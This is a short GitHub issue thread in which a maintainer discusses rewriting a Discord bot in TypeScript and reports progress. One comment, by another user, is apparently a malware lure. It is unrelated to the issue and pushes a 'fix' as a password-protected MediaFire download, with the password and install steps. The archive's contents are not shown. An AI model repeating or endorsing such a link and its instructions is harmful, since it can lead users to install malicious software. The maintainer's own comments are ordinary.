### ISSUE TITLE
TypeScript Rewrite

### ISSUE THREAD

**Issue by NobleWolf42** [NobleWolf42/Stormageddon-Bot#107]
Rewrite the Bot in TypeScript for better control over the types and general bug stoppage.

**Comment by NobleWolf42** [comment]
Have the bulk of the project done, just some clean up needed on the commands, as well as some rewrites on auto Role and message handling for better performance, search the codebase for FIX for other possible things that need to be done better.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by NobleWolf42** [comment]
This is now done, not merging to main until some other clean up is finished, also needs testing
